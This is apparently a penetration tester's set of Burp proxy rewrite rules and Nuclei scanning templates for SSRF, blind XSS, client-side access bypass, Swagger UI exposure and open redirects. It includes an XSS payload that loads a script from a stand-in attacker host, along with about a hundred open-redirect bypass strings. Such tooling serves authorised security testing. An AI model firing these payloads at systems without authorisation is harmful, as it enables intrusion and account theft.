My Nuclei templates and proxy match/replace rules

The entries below written as Type / Match / Replace are proxy match-and-replace rules (Burp-style), not Nuclei templates; the Nuclei templates (`id:` / `info:` / `http:` documents) follow after them.
SSRF: a rule that rewrites every URL found in the headers of requests passing through the proxy to your callback URL, so that a server-side fetch of that value shows up on your listener:
Type: Request Header
Match: https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b([-a-zA-Z0-9()@:%_\+.~#?&//=]*)
Replace: https://{YOUR_SERVER}/
Caveat: with the scope set to every request header this also rewrites Origin and Referer, which can trip the target's CSRF/origin checks and change the behaviour you are testing; narrow the scope to the headers you actually intend, and treat a callback only as evidence that the server fetched the URL, not that the fetch is exploitable.
-----------------------------
Blind XSS: a rule that replaces the whole Referer header with your blind-XSS payload (the Referer is often stored and rendered later in logs, analytics or admin views, so the payload may fire long after the request; the payload must call back to a listener you control):
Type: Request Header
Match: ^Referer.*$
Replace: Referer: {BLIND_XSS_PAYLOAD}
-----------------------------
Reveal hidden input fields: rewrite type="hidden" to type="text" in HTML so hidden fields become visible and editable in the browser:
Type: Response Body (the pattern is HTML markup, which lives in the response body, not in request headers)
Match: type\=(\"|')hidden(\"|')
Replace: type="text"
-----------------------------
Client-side access checks via response manipulation: rewriting these values in responses can unlock UI that is gated only in the browser. It does not change server-side authorization, so anything reached this way must be re-verified with a direct request to the backend. The replacements are global, so "400" ➜ "200" rewrites body text (not the status line) and will corrupt any number or JSON value that happens to contain it; scope them as narrowly as possible.
Type: Response Body value
- "false" ➜ "true"
- "error" ➜ "success"
- "400" ➜ "200"
-----------------------------
Blind XSS in parameter values: replace a request parameter value with a payload that loads a script from a host you control (attacker.com below is a placeholder; use your own listener, as with {YOUR_SERVER} above):
Type: Request parameter value
"><script src=https://attacker.com></script>
-----------------------------
---
id: swagger-ui
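info:
  name: Swagger UI
  author: vidocsecurity
  severity: low
  description: |
    Detects an exposed Swagger UI page or OpenAPI/Swagger spec. The spec
    discloses endpoints and parameters; some Swagger UI builds are also
    vulnerable to XSS, which this template does not test.
  tags: swagger-ui,exposure
  metadata:
    # One GET per unique path below (three duplicate paths were removed).
    max-request: 51

http:
  - method: GET
    path:
      - '{{BaseURL}}/'
      - '{{BaseURL}}/index.html'
      - '{{BaseURL}}/swagger-ui'
      - '{{BaseURL}}/api/'
      - '{{BaseURL}}/docs/'
      - '{{BaseURL}}/idm/v2/api-docs'
      - '{{BaseURL}}/docs/api-reference'
      - '{{BaseURL}}/swaggerui'
      - '{{BaseURL}}/api/help'
      - '{{BaseURL}}/doc'
      - '{{BaseURL}}/doc/'
      - '{{BaseURL}}/docu'
      - '{{BaseURL}}/docs'
      - '{{BaseURL}}/api-doc'
      - '{{BaseURL}}/api-docs/swagger.json'
      - '{{BaseURL}}/api-reference'
      - '{{BaseURL}}/swagger.json'
      - '{{BaseURL}}/swagger/docs/v1'
      - '{{BaseURL}}/reference'
      - '{{BaseURL}}/swagger-ui.html/swagger-ui.html'
      - '{{BaseURL}}/swagger/index.html'
      - '{{BaseURL}}/swagger-ui.html'
      - '{{BaseURL}}/swagger/v1/swagger.json'
      - '{{BaseURL}}/swagger/swagger-ui.html'
      - '{{BaseURL}}/api/swagger-ui.html'
      - '{{BaseURL}}/api-docs/swagger.yaml'
      - '{{BaseURL}}/api-docs/'
      - '{{BaseURL}}/api/swagger'
      - '{{BaseURL}}/api/index.html'
      - '{{BaseURL}}/api/doc'
      - '{{BaseURL}}/api/docs/'
      - '{{BaseURL}}/api/swagger/index.html'
      - '{{BaseURL}}/api/swagger/swagger-ui.html'
      - '{{BaseURL}}/api/swagger-ui/api-docs'
      - '{{BaseURL}}/api/apidocs'
      - '{{BaseURL}}/webjars/swagger-ui/index.html'
      - '{{BaseURL}}/api/swagger/static/index.html'
      - '{{BaseURL}}/api/swagger-resources'
      - '{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs'
      - '{{BaseURL}}/api/__swagger__/'
      - '{{BaseURL}}/api/_swagger_/'
      - '{{BaseURL}}/api/spec'
      - '{{BaseURL}}/api/swagger/ui/index'
      - '{{BaseURL}}/__swagger__/'
      - '{{BaseURL}}/api/v2/doc'
      - '{{BaseURL}}/api/v1/'
      - '{{BaseURL}}/api/v1/doc'
      - '{{BaseURL}}/_swagger_/'
      - '{{BaseURL}}/swagger-resources/restservices/v2/api-docs'
      - '{{BaseURL}}/classicapi/doc/'
      - '{{BaseURL}}/api/v1/openapi'

    redirects: true
    max-redirects: 3

    matchers-condition: and
    matchers:
      - type: word
        part: body
        # Any one fingerprint is enough. The previous "and" required every
        # word (HTML markers, JSON "swagger": and YAML swagger: together) to
        # appear in one response, which no single page satisfies, so the
        # template could never match. The broader strings ("api-docs",
        # "swagger.json") also hit pages that merely mention them; review
        # hits on "/" and "/index.html" before reporting.
        condition: or
        words:
          - "swagger-ui"
          - "swagger-initializer"
          - "api-docs"
          - "swagger.json"
          - "swagger:"
          - "Swagger 2.0"
          - "\"swagger\":"
          - "Swagger UI"
          - "loadSwaggerUI"
          # NOTE(review): "**token**:" looks like a copy artefact (markdown
          # bold) rather than a Swagger fingerprint; confirm before keeping.
          - "**token**:"
          - "id=\"swagger-ui"

      - type: status
        status:
          - 200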
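---
id: open-redirect-generic

info:
  name: Open Redirect - Detection
  author: afaq,melbadry9,Elmahdi,pxmme1337,Regala_,andirrahmani1,geeknik
  severity: medium
  description: |
    An open redirect vulnerability was detected. An attacker can redirect a
    user to a malicious site and possibly obtain sensitive information,
    modify data, and/or execute unauthorized operations.
    Scope: every payload is appended to the site root, so this only finds
    path-based redirects; parameter-based redirects (?next=, ?returnUrl=, ...)
    need a separate template or parameter fuzzing.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    # One GET per payload below; stop-at-first-match makes this the upper
    # bound, not the typical count. (One exact duplicate payload was removed.)
    max-request: 105
  tags: redirect,generic

http:
  - method: GET
    path:
      - "{{RootURL}}/{{redirect}}"

    payloads:
      redirect:
        - '%0a/oast.me/'
        - '%0d/oast.me/'
        - '%00/oast.me/'
        - '%09/oast.me/'
        - '%5C%5Coast.me/%252e%252e%252f'
        - '%5Coast.me'
        - '%5coast.me/%2f%2e%2e'
        # {{RootURL}} expands to scheme://host, producing host-suffix
        # confusion payloads such as http://targetoast.me/...
        - '%5c{{RootURL}}oast.me/%2f%2e%2e'
        - '//#//oast.me/'
        - '//oast.me/%2f%2e%2e'
        - '//oast.me/%2e%2e'
        - '//%09/oast.me'
        - '//%5coast.me'
        - '//oast.me/..;/css'
        - '//\http://oast.me'
        - '//%EF%B9%B0/https://oast.me'
        - '//;@oast.me'
        - '../oast.me'
        - '.oast.me'
        - '/%5coast.me'
        - '////\;@oast.me'
        - '////oast.me'
        - '///oast.me'
        - '///oast.me/%2f%2e%2e'
        - '///oast.me@//'
        - '///{{RootURL}}oast.me/%2f%2e%2e'
        - '//\/oast.me/'
        - '//\@oast.me'
        - '//\oast.me'
        - '//\oast.me/'
        - '//oast.me/%2F..'
        - '//oast.me//'
        - '//%6f%61%73%74%2e%6d%65'
        - '//oast.me@//'
        - '//oast.me\toast.me/'
        - '//https://oast.me//'
        - '/<>//oast.me'
        - '/\/\/oast.me/'
        - '/\/oast.me'
        - '/\oast.me'
        - '//@oast.me'
        - '///@oast.me'
        - '////@oast.me/'
        - '/oast.me'
        - '//oast.me'
        - '/oast.me/%2F..'
        - '/oast.me/'
        - '/oast.me/..;/css'
        - '/https:oast.me'
        - '/{{RootURL}}oast.me/'
        - '/〱oast.me'
        - '/〵oast.me'
        - '/ゝoast.me'
        # NOTE(review): the next two entries render identically here; the
        # upstream list uses the fullwidth and halfwidth forms of this
        # character, so confirm both code points survived the copy.
        - '/ーoast.me'
        - '/ーoast.me'
        - '<>//oast.me'
        - '@oast.me'
        - '@https://oast.me'
        - '\/\/oast.me/'
        - 'oast%E3%80%82me'
        - 'oast.me'
        - 'oast.me/'
        - 'oast.me//'
        - 'oast.me;@'
        - 'https%3a%2f%2foast.me%2f'
        - 'https:%0a%0doast.me'
        - 'https://%0a%0doast.me'
        - 'https://%09/oast.me'
        - 'https://%2f%2f.oast.me/'
        - 'https://%3F.oast.me/'
        - 'https://%5c%5c.oast.me/'
        - 'https://%5coast.me@'
        - 'https://%23.oast.me/'
        - 'https://.oast.me'
        - 'https://////oast.me'
        - 'https:///oast.me'
        - 'https:///oast.me/%2e%2e'
        - 'https:///oast.me/%2f%2e%2e'
        - 'https:///oast.me@oast.me/%2e%2e'
        - 'https:///oast.me@oast.me/%2f%2e%2e'
        - 'https://:80#@oast.me/'
        - 'https://:80?@oast.me/'
        - 'https://:@\@oast.me'
        - 'https://:@oast.me\@oast.me'
        - 'https://;@oast.me'
        - 'https://\toast.me/'
        - 'https://oast.me/oast.me'
        - 'https://oast.me/https://oast.me/'
        - 'https://www.\.oast.me'
        - 'https:/\/\oast.me'
        - 'https:/\oast.me'
        - 'https:/oast.me'
        - 'https:oast.me'
        - '{{RootURL}}oast.me'
        - '〱oast.me'
        - '〵oast.me'
        - 'ゝoast.me'
        # NOTE(review): same fullwidth/halfwidth caveat as above.
        - 'ーoast.me'
        - 'ーoast.me'
        - 'redirect/oast.me'
        - 'cgi-bin/redirect.cgi?oast.me'
        - 'out?oast.me'
        - 'login?to=http://oast.me'
        - '1/_https@oast.me'
        - 'redirect?targeturl=https://oast.me'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: header
        # The Location value must start with a scheme, "//", "/\\" or "/\"
        # and name oast.me before any path, so a same-origin relative
        # Location such as "/oast.me" does not count; a hit is a redirect
        # that leaves the origin.
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

      - type: status
        status:
          - 301
          - 302
          - 307
          - 308
        condition: or

# NOTE(review): this digest was computed over the original upstream text; after
# the edits above it no longer matches, so nuclei will treat the template as
# unsigned. Re-sign with your own key or drop the line.
# digest: 4a0a00473045022100b327ea17f154456b706a540e72c9c79e4c901a70091e38648ed261ecd5b0094502202f0ae209b845dc30c6fb92d9f33617dbca5720568776d2b1e8df2c17cb36202d:922c64590222798bb761d5b6d8e72950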
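---
id: swagger-ui-config-url-injection-Extensive

info:
  name: Swagger UI Config URL Injection
  author: Shadowbyte
  severity: low
  description: |
    Requests Swagger UI endpoints (including versioned paths) with a
    configUrl / url query parameter pointing at an external spec and reports
    an HTTP 200 that still carries Swagger UI content.
    NOTE(review): the matcher only sees the served HTML; whether the query
    parameter is honoured is presumably decided by the client-side bundle, so
    a hit means "Swagger UI present at this path", not "injection confirmed".
    Verify in a browser against the deployed Swagger UI version.
  tags: swagger-ui,xss,injection
  metadata:
    # One GET per path below.
    max-request: 59

variables:
  # Both defaults are third-party hosts the tester does not control: the
  # content they serve is unknown, may change at any time, and the URLs end
  # up in the target's access logs. Point them at infrastructure you own
  # before running this against anything in scope.
  config_url: "https://xss.smarpo.com/test.json"
  spec_url: "https://jumpy-floor.surge.sh/test.yaml"

http:
  - method: GET
    path:
      - '{{BaseURL}}/swagger-ui/index.html?url={{spec_url}}'
      - '{{BaseURL}}/api/swagger/?url={{spec_url}}'
      - '{{BaseURL}}/swagger-ui/index.html?configUrl={{config_url}}&url={{spec_url}}'
      - '{{BaseURL}}/?configUrl={{config_url}}'
      - '{{BaseURL}}/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/webjars/swagger-ui/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/swagger-ui?configUrl={{config_url}}'
      - '{{BaseURL}}/swagger-ui/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/api/?configUrl={{config_url}}'
      - '{{BaseURL}}/docs/?configUrl={{config_url}}'
      - '{{BaseURL}}/idm/v2/api-docs?configUrl={{config_url}}'
      - '{{BaseURL}}/docs/api-reference?configUrl={{config_url}}'
      - '{{BaseURL}}/swaggerui?configUrl={{config_url}}'
      - '{{BaseURL}}/api/help?configUrl={{config_url}}'
      - '{{BaseURL}}/doc?configUrl={{config_url}}'
      - '{{BaseURL}}/api-reference?configUrl={{config_url}}'
      - '{{BaseURL}}/swagger/docs/v1?configUrl={{config_url}}'
      - '{{BaseURL}}/reference?configUrl={{config_url}}'
      - '{{BaseURL}}/swagger/ui/index?configUrl={{config_url}}'
      - '{{BaseURL}}/swagger/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/swagger-ui.html?configUrl={{config_url}}'
      - '{{BaseURL}}/swagger/swagger-ui.html?configUrl={{config_url}}'
      - '{{BaseURL}}/api/swagger-ui.html?configUrl={{config_url}}'
      - '{{BaseURL}}/api-docs/?configUrl={{config_url}}'
      - '{{BaseURL}}/api/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/api/docs/?configUrl={{config_url}}'
      - '{{BaseURL}}/api/swagger/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/api/swagger/swagger-ui.html?configUrl={{config_url}}'
      - '{{BaseURL}}/api/swagger-ui/api-docs?configUrl={{config_url}}'
      - '{{BaseURL}}/api/api-docs?configUrl={{config_url}}'
      - '{{BaseURL}}/api/apidocs?configUrl={{config_url}}'
      - '{{BaseURL}}/api/swagger?configUrl={{config_url}}'
      - '{{BaseURL}}/api/swagger/static/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/api/swagger-resources?configUrl={{config_url}}'
      - '{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs?configUrl={{config_url}}'
      - '{{BaseURL}}/api/__swagger__/?configUrl={{config_url}}'
      - '{{BaseURL}}/api/_swagger_/?configUrl={{config_url}}'
      - '{{BaseURL}}/api/spec?configUrl={{config_url}}'
      - '{{BaseURL}}/api/swagger/ui/index?configUrl={{config_url}}'
      - '{{BaseURL}}/__swagger__/?configUrl={{config_url}}'
      - '{{BaseURL}}/api/v2/doc?configUrl={{config_url}}'
      - '{{BaseURL}}/api/v1/?configUrl={{config_url}}'
      - '{{BaseURL}}/api/v1/doc?configUrl={{config_url}}'
      - '{{BaseURL}}/_swagger_/?configUrl={{config_url}}'
      - '{{BaseURL}}/swagger-resources/restservices/v2/api-docs?configUrl={{config_url}}'
      - '{{BaseURL}}/classicapi/doc/?configUrl={{config_url}}'
      - '{{BaseURL}}/api/v1/openapi?configUrl={{config_url}}'
      # Versioned paths
      - '{{BaseURL}}/v0.12/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/v0.11/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/v0.10/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/v0.9/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/v0.8/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/v0.7/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/v0.6/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/v0.5/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/v0.4/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/v0.3/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/v0.2/index.html?configUrl={{config_url}}'
      - '{{BaseURL}}/v0.1/index.html?configUrl={{config_url}}'

    redirects: true
    max-redirects: 3

    matchers-condition: and
    matchers:
      - type: word
        part: body
        # Presence fingerprints only; none of these prove the query
        # parameter was used (see the description).
        words:
          - "swagger-ui"
          - "swagger-initializer"
          - "api-docs"
          - "swagger.json"
        condition: or

      - type: status
        status:
          - 200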